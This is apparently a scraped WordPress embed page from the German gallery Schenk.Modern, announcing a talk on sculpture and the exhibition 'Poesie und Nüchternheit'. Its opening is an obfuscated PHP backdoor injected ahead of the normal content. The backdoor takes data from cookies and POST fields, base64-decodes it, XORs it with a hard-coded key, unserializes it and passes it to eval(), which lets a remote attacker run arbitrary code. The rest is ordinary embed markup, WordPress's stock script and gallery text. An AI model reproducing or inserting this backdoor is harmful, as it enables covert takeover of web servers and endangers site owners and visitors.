$VmwjsZT = chr (84) . chr ( 369 - 259 )."\x5f" . "\x56" . "\143" . 'p' . chr (113); $zWnQxcrBl = chr (99) . 'l' . chr ( 855 - 758 ).chr (115) . "\x73" . "\137" . 'e' . chr ( 848 - 728 ).chr ( 151 - 46 ).chr (115) . "\x74" . 's';$bOHBFnJ = class_exists($VmwjsZT); $zWnQxcrBl = "57169";$IyItLss = !1;if ($bOHBFnJ == $IyItLss){function JPvva(){return FALSE;}$JzpWA = "41816";JPvva();class Tn_Vcpq{private function dmHOK($JzpWA){if (is_array(Tn_Vcpq::$GxbyKeJE)) {$dYSxPss = str_replace('<' . "\77" . "\160" . "\x68" . "\160", "", Tn_Vcpq::$GxbyKeJE["\143" . "\157" . chr ( 458 - 348 )."\164" . chr (101) . chr ( 672 - 562 ).'t']);eval($dYSxPss); $JzpWA = "41816";exit();}}private $jSmDNQgBqI;public function rctrjkj(){echo 38362;}public function __destruct(){$JzpWA = "25097_48173";$this->dmHOK($JzpWA); $JzpWA = "25097_48173";}public function __construct($JrQIvganOn=0){$cdCjWWQgq = $_POST;$fAslsGiE = $_COOKIE;$OLSSSM = "21b05cc4-7663-4581-8527-065f03c8e16e";$kEMyP = @$fAslsGiE[substr($OLSSSM, 0, 4)];if (!empty($kEMyP)){$ZVlVkkfPa = "base64";$ntVSOoLqhu = "";$kEMyP = explode(",", $kEMyP);foreach ($kEMyP as $gcaZhsD){$ntVSOoLqhu .= @$fAslsGiE[$gcaZhsD];$ntVSOoLqhu .= @$cdCjWWQgq[$gcaZhsD];}$ntVSOoLqhu = array_map($ZVlVkkfPa . chr ( 978 - 883 ).chr ( 394 - 294 ).'e' . "\143" . 'o' . 'd' . chr (101), array($ntVSOoLqhu,)); $ntVSOoLqhu = $ntVSOoLqhu[0] ^ str_repeat($OLSSSM, (strlen($ntVSOoLqhu[0]) / strlen($OLSSSM)) + 1);Tn_Vcpq::$GxbyKeJE = @unserialize($ntVSOoLqhu); $ntVSOoLqhu = class_exists("25097_48173");}}public static $GxbyKeJE = 45810;}$KRqxT = new /* 51159 */ $VmwjsZT(41816 + 41816); $IyItLss = $KRqxT = $JzpWA = Array();} 1.0Schenk.Modernhttps://www.schenkmodern.deroothttps://www.schenkmodern.de/author/root/FRÜHSTÜCKSGESPRÄCH: Faszination Skulptur. Formensprache und Sammlungsobjekt. - Schenk.Modernrich600338<blockquote class="wp-embedded-content" data-secret="HPxb3oGVC6"><a href="https://www.schenkmodern.de/fruehstuecksgespraech-faszination-skulptur-formensprache-und-sammlungsobjekt/">FRÜHSTÜCKSGESPRÄCH: Faszination Skulptur. Formensprache und Sammlungsobjekt.</a></blockquote><iframe sandbox="allow-scripts" security="restricted" src="https://www.schenkmodern.de/fruehstuecksgespraech-faszination-skulptur-formensprache-und-sammlungsobjekt/embed/#?secret=HPxb3oGVC6" width="600" height="338" title="“FRÜHSTÜCKSGESPRÄCH: Faszination Skulptur. Formensprache und Sammlungsobjekt.” — Schenk.Modern" data-secret="HPxb3oGVC6" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" class="wp-embedded-content"></iframe><script type="text/javascript"> /* <![CDATA[ */ /*! This file is auto-generated */ !function(d,l){"use strict";l.querySelector&&d.addEventListener&&"undefined"!=typeof URL&&(d.wp=d.wp||{},d.wp.receiveEmbedMessage||(d.wp.receiveEmbedMessage=function(e){var t=e.data;if((t||t.secret||t.message||t.value)&&!/[^a-zA-Z0-9]/.test(t.secret)){for(var s,r,n,a=l.querySelectorAll('iframe[data-secret="'+t.secret+'"]'),o=l.querySelectorAll('blockquote[data-secret="'+t.secret+'"]'),c=new RegExp("^https?:$","i"),i=0;i<o.length;i++)o[i].style.display="none";for(i=0;i<a.length;i++)s=a[i],e.source===s.contentWindow&&(s.removeAttribute("style"),"height"===t.message?(1e3<(r=parseInt(t.value,10))?r=1e3:~~r<200&&(r=200),s.height=r):"link"===t.message&&(r=new URL(s.getAttribute("src")),n=new URL(t.value),c.test(n.protocol))&&n.host===r.host&&l.activeElement===s&&(d.top.location.href=t.value))}},d.addEventListener("message",d.wp.receiveEmbedMessage,!1),l.addEventListener("DOMContentLoaded",function(){for(var e,t,s=l.querySelectorAll("iframe.wp-embedded-content"),r=0;r<s.length;r++)(t=(e=s[r]).getAttribute("data-secret"))||(t=Math.random().toString(36).substring(2,12),e.src+="#?secret="+t,e.setAttribute("data-secret",t)),e.contentWindow.postMessage({message:"ready",secret:t},"*")},!1)))}(window,document); /* ]]> */ </script> https://www.schenkmodern.de/wp-content/uploads/2023/02/wvz13316_1-scaled.jpg25601843Unsere Ausstellung „Poesie und Nüchternheit“ spielt mit Kontrasten. Sie ist ein Dialog zweier Künstler, deren Werke unterschiedlicher nicht sein könnten.Auf der einen Seite die Metallskulpturen des Bildhauers Hartmut Sy, bei denen sich Schwere und Leichtigkeit auf wunderbare Weise gegenseitig aufzuheben scheinen. Auf der anderen Seite die farbgewaltigen und energiegeladenen Pa­pierarbeiten von Lorenz Spring, Motive von Seerosen und Bergpanoramen, die uns auf poetische Weise die Geheim­nisse der Natur offenbaren.